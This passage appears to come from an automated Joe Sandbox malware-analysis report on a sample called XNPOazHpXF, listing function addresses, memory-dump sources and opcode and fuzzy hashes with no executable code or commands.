                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2139918697.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f20000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 526d370ccfd9d14ddbfdbe1456352f508ef13d3b40126482f42584f32d307a11
                                                                • Instruction ID: 3788660e1fc59470a62b7a09d23a527f3ce1e86f296a6d60f9beb55614915d31
                                                                • Opcode Fuzzy Hash: 526d370ccfd9d14ddbfdbe1456352f508ef13d3b40126482f42584f32d307a11
                                                                • Instruction Fuzzy Hash: 7231BAB190891C9FCBA8EB04C895BE9B7F1FB68305F5001EE910DE3291CA755AC0CF55
                                                                Function 00007FF84962C568 Relevance: .1, Instructions: 87COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6b405f8cef41ea76b1fcc33e7d4a6242abf9a39b467578de4df1115ad86dae94
                                                                • Instruction ID: a17e48dbb9d085225726e6c2d48e72be450bec23d9f2f9eff79133ed517c3f5d
                                                                • Opcode Fuzzy Hash: 6b405f8cef41ea76b1fcc33e7d4a6242abf9a39b467578de4df1115ad86dae94
                                                                • Instruction Fuzzy Hash: E3112426D4D9CA0FE32ABB3854211E57FB1EF96680F0841FAE089C3187DD1EA8158381
                                                                Function 00007FF84962EFF0 Relevance: .1, Instructions: 87COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ed3ab2dba573dbb507650262bd5c75a9162c97e6cb5b7545908c2e676b76f246
                                                                • Instruction ID: 171554f8da74922897580a3542474932c19227860944569d1e4f9328ced054da
                                                                • Opcode Fuzzy Hash: ed3ab2dba573dbb507650262bd5c75a9162c97e6cb5b7545908c2e676b76f246
                                                                • Instruction Fuzzy Hash: 1131F71095C5D68EE37ABB1484709B57FA1FF523C171846BED4CACB0C7C82CA8859351
                                                                Function 00007FF8496202C2 Relevance: .1, Instructions: 84COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0862b5ce970c03f12086aa6297baa3f5b960d1f69ab670c3bfd8c67c27777d31
                                                                • Instruction ID: b89f2203b55196399ae1a256d3129b8b5e3605e4e100857c579c0530dca3c9a0
                                                                • Opcode Fuzzy Hash: 0862b5ce970c03f12086aa6297baa3f5b960d1f69ab670c3bfd8c67c27777d31
                                                                • Instruction Fuzzy Hash: E821D735E1891D9FDFA9EF58D4A5AE9B7B1FB58310F1041AAD00EE3291CA35A9818B40
                                                                Function 00007FF84962CEE2 Relevance: .1, Instructions: 83COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f34473c0456108ec0d5c92edad3e6958abee1135cc6b65573e81281823dc7614
                                                                • Instruction ID: b0407e06988503f7d14a7134c413b3997dbfe340dca9924855398c103a2a609c
                                                                • Opcode Fuzzy Hash: f34473c0456108ec0d5c92edad3e6958abee1135cc6b65573e81281823dc7614
                                                                • Instruction Fuzzy Hash: 5F21D474E1895D9FDFA9EF58C465AE9B7B1FF68300F0041AED00EE3691CB35A9818B40
                                                                Function 00007FF849630ED4 Relevance: .1, Instructions: 80COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4c8af5912324cbc41f22c34510b80573574b61a73c3026b8fac9f23eb6294cfa
                                                                • Instruction ID: e542b2056f973fb369a03ef51abf392fb0853de762d6452c9a2b7b580a3442bd
                                                                • Opcode Fuzzy Hash: 4c8af5912324cbc41f22c34510b80573574b61a73c3026b8fac9f23eb6294cfa
                                                                • Instruction Fuzzy Hash: ED214635D1D95E9FDBA4EF58D4505EDB7B1FF48384F10417AD00EE3281DA2868458B90
                                                                Function 00007FF84962D3C5 Relevance: .1, Instructions: 74COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 301e0ea9a09f4704cb00385265c995147b7a88ee9b04e77bd5e49a91557df29f
                                                                • Instruction ID: 3711516cc87fd3e94b43f4233ee70c9070150225fdfc40641dddbf040258858e
                                                                • Opcode Fuzzy Hash: 301e0ea9a09f4704cb00385265c995147b7a88ee9b04e77bd5e49a91557df29f
                                                                • Instruction Fuzzy Hash: ED11E131D0D6CA4FE3B5BB2448682B83B91EF56380F0505BAD00ACB2C2DD6868458741
                                                                Function 00007FF848F2115D Relevance: .1, Instructions: 74COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2139918697.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f20000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cd6e03bcdf7f9ab42d5b595ddf5d5557c1f4faacb6eebe3feb7fc76664ce0f77
                                                                • Instruction ID: 8f68c3e6cf69b73ed087fe6442b804b618d3e75cf3bdf7d32048497842511216
                                                                • Opcode Fuzzy Hash: cd6e03bcdf7f9ab42d5b595ddf5d5557c1f4faacb6eebe3feb7fc76664ce0f77
                                                                • Instruction Fuzzy Hash: 2321FA31A1851E8FDB94FBA8D8899ADB7F1FF58340F10057AD409D32A1DF35A981CB84
                                                                Function 00007FF849622EF0 Relevance: .1, Instructions: 68COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d6dad1ee29a89f28e86055e6f36b30f1ee0c13fd79ef08652fa30bc64fadd2dd
                                                                • Instruction ID: 48832d1cc97bd6640c707d6f30648b6b5ab8b73c641b907727951fd9b639c264
                                                                • Opcode Fuzzy Hash: d6dad1ee29a89f28e86055e6f36b30f1ee0c13fd79ef08652fa30bc64fadd2dd
                                                                • Instruction Fuzzy Hash: 15117F2096C4A78EE77CBF0884645B57292FB94351B248E79D44B8B5CECA2CBD819682
                                                                Function 00007FF84962CBE1 Relevance: .1, Instructions: 68COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a26d77276961f3c2c0959c803e4d6dc1f531555cd8ca24b29a19fbe8537004e5
                                                                • Instruction ID: 8c9ca2246adf97263d294e8d965b9c13c67b7b3e3070837537df1f1fe2e435de
                                                                • Opcode Fuzzy Hash: a26d77276961f3c2c0959c803e4d6dc1f531555cd8ca24b29a19fbe8537004e5
                                                                • Instruction Fuzzy Hash: 7A11C129F4E5D38FF2397F6929615BC2760AF85BD0F2801FAD40E9B1C2CC4C28852396
                                                                Function 00007FF84962A9C8 Relevance: .1, Instructions: 66COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8e18f703c511549796faa34d9949210d95f80eee8e9b1c38fcb21115ee2a9d67
                                                                • Instruction ID: 6f0245c7c818af9be326b124fce0edc4bd5bc00b79fb4ca398823e51be0775b6
                                                                • Opcode Fuzzy Hash: 8e18f703c511549796faa34d9949210d95f80eee8e9b1c38fcb21115ee2a9d67
                                                                • Instruction Fuzzy Hash: 4411B222D0D9C68FEB787F2499150B97BA0FF14380F1401BBD04E461C7ED686D8887C1
                                                                Function 00007FF84962E0A0 Relevance: .1, Instructions: 63COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0e3ffad25755da95d9d40702a85ffd24ba687629bb485a3c3f93fcdca7605eb3
                                                                • Instruction ID: dc3924a60a8bc19f0bd1b693f0b63316e18469a8daee892e3ad2671bde3d0911
                                                                • Opcode Fuzzy Hash: 0e3ffad25755da95d9d40702a85ffd24ba687629bb485a3c3f93fcdca7605eb3
                                                                • Instruction Fuzzy Hash: 6911013261CA894FCBA5FF35D454AFA7BD1EF80244F40067AC08EC34D2CE29B50A8380
                                                                Function 00007FF849621F70 Relevance: .1, Instructions: 63COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e249f0ab4bfe45d8465b2a4ddb562581fd19a9e8d5367c92061a2dd5ba460bcd
                                                                • Instruction ID: c744c56e8456510a21a755b6fadd5fccc4babea8846932fcbb3d3aa3b00c21bc
                                                                • Opcode Fuzzy Hash: e249f0ab4bfe45d8465b2a4ddb562581fd19a9e8d5367c92061a2dd5ba460bcd
                                                                • Instruction Fuzzy Hash: B2110135A0DA894FD7A5EF25D4456FAB3E2EF54351F40067ED04AC34D2DF2CA6498B80
                                                                Function 00007FF849621DEE Relevance: .1, Instructions: 58COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1756e61dbd815427ecde945e798c5dc0df3986276a0b8c882333fd5bcf86eb7c
                                                                • Instruction ID: 403fba9f5e1ff166dc52599f27884e510deb23bd257a41d3d5dd2225cccffe6f
                                                                • Opcode Fuzzy Hash: 1756e61dbd815427ecde945e798c5dc0df3986276a0b8c882333fd5bcf86eb7c
                                                                • Instruction Fuzzy Hash: 7011553220CA8A8FE345EF68D8587E47391EB51365F5002BFC905C31D1CB65AA61CB80
                                                                Function 00007FF849627210 Relevance: .1, Instructions: 57COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3702b9784b83a3fa91596f96b3a45c4d7b5c2dbc531b04c2eb687a64fb5d54df
                                                                • Instruction ID: faae5231bb5f36e9de12a4eb046c879ca140fa06f15d92b0cecacfff0fe3e554
                                                                • Opcode Fuzzy Hash: 3702b9784b83a3fa91596f96b3a45c4d7b5c2dbc531b04c2eb687a64fb5d54df
                                                                • Instruction Fuzzy Hash: D401F571E0DACA4FE774BB2448282BD3A95EF56380F10057AE00ED72D2DD687C468781
                                                                Function 00007FF84962DF1E Relevance: .1, Instructions: 57COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4428ae3b6c9ada45810debf48027de2ebd848ad48930e18948d751b9facf7bab
                                                                • Instruction ID: 30fbcfbe99ab7367148b65c0c2cd64188a267bc7c1b110bad7f95f3c4aa8231d
                                                                • Opcode Fuzzy Hash: 4428ae3b6c9ada45810debf48027de2ebd848ad48930e18948d751b9facf7bab
                                                                • Instruction Fuzzy Hash: C211CE3220C98A4FD715EF28E8687F437C1EF91354F2801BFD509C35D1C665A565C780
                                                                Function 00007FF84962C302 Relevance: .1, Instructions: 55COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 24c308211884cb17a6e18f0fa1e207bffddf820eb0af1ba90b4cc6ae3af32929
                                                                • Instruction ID: ca3598691bf6dbffbf7225cdf78b8157dab236c2f5b8a1a0216821fc64c57464
                                                                • Opcode Fuzzy Hash: 24c308211884cb17a6e18f0fa1e207bffddf820eb0af1ba90b4cc6ae3af32929
                                                                • Instruction Fuzzy Hash: 27014171D0D68E9FE374BE7588082B97AA5EF16380F00017BE00FE3085DE74280A8780
                                                                Function 00007FF848F20C48 Relevance: .0, Instructions: 50COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2139918697.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f20000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 78760aadc85ac66c854485e6c8c2364d38ee87d930c5b4b66c339a016338dd2a
                                                                • Instruction ID: 58884e924638032a40be33790860a7047027437df8e0693aea2984d24be92260
                                                                • Opcode Fuzzy Hash: 78760aadc85ac66c854485e6c8c2364d38ee87d930c5b4b66c339a016338dd2a
                                                                • Instruction Fuzzy Hash: F401B1B694D68E8FE702FB64D8042EABBB0FF82310F044576D541DB2D2DB386614C799
                                                                Function 00007FF84962AA2D Relevance: .0, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5366a36ca411f3a228e18d45ecf0276177767820c3a5a1084b99550790d788de
                                                                • Instruction ID: 358a2563e922201d2613fcb7a7567819f845e60d96892f33bf2fa251725bb89d
                                                                • Opcode Fuzzy Hash: 5366a36ca411f3a228e18d45ecf0276177767820c3a5a1084b99550790d788de
                                                                • Instruction Fuzzy Hash: 8401A721D0D5D78FE7B4BF6459651F96BA1EF55250F1401FBC04ECB1C2DD5868848782
                                                                Function 00007FF848F20C50 Relevance: .0, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2139918697.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f20000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8d59ef940f2ff1390753c2cc2df5c3f0bc49b4deb08525dd4c4a366f12d27f3d
                                                                • Instruction ID: 25b6870aebc8b9b167fe67039714bc588eca13bc2fd5df277f2429f3ed14ae7a
                                                                • Opcode Fuzzy Hash: 8d59ef940f2ff1390753c2cc2df5c3f0bc49b4deb08525dd4c4a366f12d27f3d
                                                                • Instruction Fuzzy Hash: 8801DBB1D4D68A8EE702FB64D8042EABBB0FF82310F040676D901DB2D2CB382214C789
                                                                Function 00007FF848F21328 Relevance: .0, Instructions: 41COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2139918697.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f20000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 14536fca1f33b8c647bc5e8206aad668550b14580c2e5c0fdfcc768c6f476dd4
                                                                • Instruction ID: f22fb4c34cd5df4a3edf5c233920121a06794c4822fb2958e5ecec7cf5b4e2e1
                                                                • Opcode Fuzzy Hash: 14536fca1f33b8c647bc5e8206aad668550b14580c2e5c0fdfcc768c6f476dd4
                                                                • Instruction Fuzzy Hash: 8501A87090894D9FDF84EF58C448AAE7BF0FF68345F00056AE419D3250DB30E590CB80
                                                                Function 00007FF848F20B9D Relevance: .0, Instructions: 40COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2139918697.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f20000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d4176b172a92791afadfa68584453320fbcc02c519bddf1f29bb33a61e984357
                                                                • Instruction ID: c2e2b812d4c44390218fad1c90c43650a57bd4d4357a12b68708005102b0757b
                                                                • Opcode Fuzzy Hash: d4176b172a92791afadfa68584453320fbcc02c519bddf1f29bb33a61e984357
                                                                • Instruction Fuzzy Hash: CA01E43092868DCFCB84EF18D885AA97BE0FF58304F040166E849D3250D734E960CB81
                                                                Function 00007FF8496205D2 Relevance: .0, Instructions: 38COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 63d19bb5c36f73d5ff15bee9b54583d362b3a4d64946519479ac5010cf2c9334
                                                                • Instruction ID: ede556b488143d1b5bc89f080902c9b5abee7b82b405839869c912b23114b184
                                                                • Opcode Fuzzy Hash: 63d19bb5c36f73d5ff15bee9b54583d362b3a4d64946519479ac5010cf2c9334
                                                                • Instruction Fuzzy Hash: B0F0623184E3C99FD722EF7089565E57FA4AF43244B1800FAE4458B0A2D66D5616C761
                                                                Function 00007FF84962CE30 Relevance: .0, Instructions: 37COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f5782376a14c1ca9f350fc53a517664e50ac4fbf88ee4fbabfe5fa87e8f244b3
                                                                • Instruction ID: 678ed9bb2ea565e3943d2727042857844c350aa4be551468c8c033abee4cc2ce
                                                                • Opcode Fuzzy Hash: f5782376a14c1ca9f350fc53a517664e50ac4fbf88ee4fbabfe5fa87e8f244b3
                                                                • Instruction Fuzzy Hash: 5AF0BB7490895CCFCF55EF98C894AACBBB1FF68345F10019DC00AEB251C630A841DF00
                                                                Function 00007FF84962D11F Relevance: .0, Instructions: 29COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
                                                                • Instruction ID: 29da9ab3e3621f55c026e5c541d3b753d46ac60d7af7fbf71df87d3a2c267692
                                                                • Opcode Fuzzy Hash: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
                                                                • Instruction Fuzzy Hash: 7BF0D47490A998DFCF55EBA8C85AE99BBB0FF68300F1001DDD04ADB262CA319845CF40
                                                                Function 00007FF84962AA95 Relevance: .0, Instructions: 22COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c5d48ee350b63896b462a989aa40031aa0f6b8c48f8fd4422c10e4405d7da408
                                                                • Instruction ID: 0ac5f6f7292b6e82acbb7380fcd3a4e63c293c959f23143e2295d982ce1fe3ae
                                                                • Opcode Fuzzy Hash: c5d48ee350b63896b462a989aa40031aa0f6b8c48f8fd4422c10e4405d7da408
                                                                • Instruction Fuzzy Hash: F1E04F3681E2C98FE771FF108A560EC7F61BF51380F5801E7D509471D2EB696A189643
                                                                Function 00007FF848F2352F Relevance: .0, Instructions: 15COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2139918697.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f20000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 49e564d1729df9311648f3358d49fef3efb7496483c132e70508d52c999d8079
                                                                • Instruction ID: e3a80d735fff68c8dff522ed84a279281a031df2195cd3f7e948e1eb31201213
                                                                • Opcode Fuzzy Hash: 49e564d1729df9311648f3358d49fef3efb7496483c132e70508d52c999d8079
                                                                • Instruction Fuzzy Hash: BEE0EC30A0981D9ED771EB18DC543AAB671EF84301F1042F5900E96299CE352E868B80
                                                                Function 00007FF849621DCB Relevance: .0, Instructions: 11COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4b325eaacfe3e71f739a7a297d16ced70d129d28754c306d5ec5bc38144b417d
                                                                • Instruction ID: 257950247b19507d603f3444a53f00012563ea463f4218fa658a39c8151ac4d2
                                                                • Opcode Fuzzy Hash: 4b325eaacfe3e71f739a7a297d16ced70d129d28754c306d5ec5bc38144b417d
                                                                • Instruction Fuzzy Hash: 5ED01214A0D6D7CDF2397FC18070E3EA1D06F05781E22483EC16F818C1CE1D7601AE01
                                                                Function 00007FF84962DEFB Relevance: .0, Instructions: 11COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0078daf39e87aa0426dccabd76b4d788d610aa2f2f9ed6bf8e1ea0b22f85d295
                                                                • Instruction ID: 58f5180c06c67a949dcfe7f39bd44abea5061375aa129419e7db65b443bea11d
                                                                • Opcode Fuzzy Hash: 0078daf39e87aa0426dccabd76b4d788d610aa2f2f9ed6bf8e1ea0b22f85d295
                                                                • Instruction Fuzzy Hash: 5BD01270A1C5D38DF33A7F41853833E66A19F513C1E60003ED09F4A8C6CD2CB801661A
                                                                Function 00007FF8496212DF Relevance: .0, Instructions: 8COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7d4c10f2c5c14c22a7e8cb2fc87a3e521df53a417e4f8777c23ce06f731aa2dc
                                                                • Instruction ID: 637081ded260ab0185f178d8be119af1f28134a5f97684c05d420111f9e832d9
                                                                • Opcode Fuzzy Hash: 7d4c10f2c5c14c22a7e8cb2fc87a3e521df53a417e4f8777c23ce06f731aa2dc
                                                                • Instruction Fuzzy Hash: 17C04C14F0D2D39FE6317BB4585193926901F0B288B150971D51A8A2C3D85C78846A95

                                                                Non-executed Functions

                                                                Function 00007FF8490C0121 Relevance: 128.7, Strings: 101, Instructions: 2474COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2141556603.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff8490c0000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $!$"$#$$$%$&$'$($)$*$+$,$-$.$/$0$1$2$3$4$5$6$7$8$9$:$;$<$=$>$?$@$A$B$C$D$E$F$G$H$I$J$K$L$M$N$O$P$P~N$P~N$P~N$Q$R$S$T$U$V$W$X$Y$Z$[$\$]$^$_$`$a$b$c$d$e$f$g$h$i$j$k$l$m$n$o$p$q$r$s$t$u$v$w$x$y$z${$|$}$~$hty$hty$hty
                                                                • API String ID: 0-269381984
                                                                • Opcode ID: 43f3edb788e06496a9a2c65fa3add34625278db72b2baa5253a39444bb1c495f
                                                                • Instruction ID: 833468dba25da39772ab892b91e457af1040356da0b4c795455b338666846ccf
